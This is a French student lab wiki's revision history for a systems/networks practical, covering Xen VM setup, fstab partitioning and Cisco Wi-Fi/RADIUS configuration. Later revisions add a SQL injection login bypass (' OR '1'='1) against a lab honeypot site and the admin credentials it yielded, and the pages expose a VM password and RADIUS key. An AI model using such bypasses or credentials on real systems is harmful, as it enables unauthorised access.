== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
==Redirection DNS==<br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.240<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
<br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=53069
TP sysres IMA5sc 2020/2021 G7
2020-11-02T16:21:06Z
<p>Nekhlas- : </p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
==Redirection DNS==<br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.240<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
<br />
<br />
Intrusion honey.plil.info /<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=53065
TP sysres IMA5sc 2020/2021 G7
2020-11-02T16:01:12Z
<p>Nekhlas- : /* Configuration des bornes Wi-Fi */</p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
==Redirection DNS==<br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.240<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway></div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=52584
TP sysres IMA5sc 2020/2021 G7
2020-10-12T17:03:07Z
<p>Nekhlas- : </p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24<br />
<br>Netmask: 255.255.255.240<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=52583
TP sysres IMA5sc 2020/2021 G7
2020-10-12T16:54:45Z
<p>Nekhlas- : </p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24<br />
<br>Netmask: 255.255.255.240<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
4) Unmout mnt <br />
umount /mnt<br />
<br />
5) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=52572
TP sysres IMA5sc 2020/2021 G7
2020-10-12T15:32:54Z
<p>Nekhlas- : /* Installation VM */</p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24<br />
<br>Netmask: 255.255.255.240<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=52571
TP sysres IMA5sc 2020/2021 G7
2020-10-12T15:32:33Z
<p>Nekhlas- : </p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24<br />
<br>Netmask: 255.255.255.240<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=52570
TP sysres IMA5sc 2020/2021 G7
2020-10-12T15:32:00Z
<p>Nekhlas- : </p>
<hr />
<div>"Explication Infrastructure"<br />
"Installation VM"<br />
<br />
connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24<br />
<br>Netmask: 255.255.255.240<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=52569
TP sysres IMA5sc 2020/2021 G7
2020-10-12T15:31:27Z
<p>Nekhlas- : </p>
<hr />
<div>"Explication Infrastructure"<br />
"Installation VM"<br />
<br />
connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br />
<br>Nom de domaine: girolle.site<br />
<br>IP : 100.64.0.24<br />
<br>netmask: 255.255.255.240<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=52568
TP sysres IMA5sc 2020/2021 G7
2020-10-12T15:30:40Z
<p>Nekhlas- : </p>
<hr />
<div>"Explication Infrastructure"<br />
"Installation VM"<br />
<br />
connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br />
Nom de domaine: girolle.site<br />
<br>IP : 100.64.0.24<br />
netmask: 255.255.255.240</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=52567
TP sysres IMA5sc 2020/2021 G7
2020-10-12T15:29:56Z
<p>Nekhlas- : Page créée avec « "Explication Infrastructure" "Installation VM" connexion ssh: ssh pifou@capbreton.plil.info commande (en root su -): xen-create-image --hostname=girolle --ip=100.64.0.... »</p>
<hr />
<div>"Explication Infrastructure"<br />
"Installation VM"<br />
<br />
connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br />
Nom de domaine: girolle.site<br />
IP : 100.64.0.24<br />
netmask: 255.255.255.240</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021&diff=52559
TP sysres IMA5sc 2020/2021
2020-10-12T14:58:07Z
<p>Nekhlas- : /* Répartition des binômes */</p>
<hr />
<div>== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G1 | Cahier groupe n°1]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G2 | Cahier groupe n°2]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G3 | Cahier groupe n°3]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G4 | Cahier groupe n°4]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G5 | Cahier groupe n°5]]<br />
| RINGOT Loïc & SANCHEZ Pierre<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G6 | Cahier groupe n°6]]<br />
| NDUWAMUNGU Jean De Dieu & MOINAT Théau<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G7 | Cahier groupe n°7]]<br />
| EKHLAS EID Nour & BISALLI Clara<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G8 | Cahier groupe n°8]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G9 | Cahier groupe n°9]]<br />
| VIEUBLED Tanguy & VERNIER Paul<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G10 | Cahier groupe n°10]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G11 | Cahier groupe n°11]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G12 | Cahier groupe n°12]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G13 | Cahier groupe n°13]]<br />
| NOM Prénom & NOM Prénom<br />
|-<br />
| [[ TP sysres IMA5sc 2020/2021 G14 | Cahier groupe n°14]]<br />
| NOM Prénom & NOM Prénom<br />
|}</div>
Nekhlas-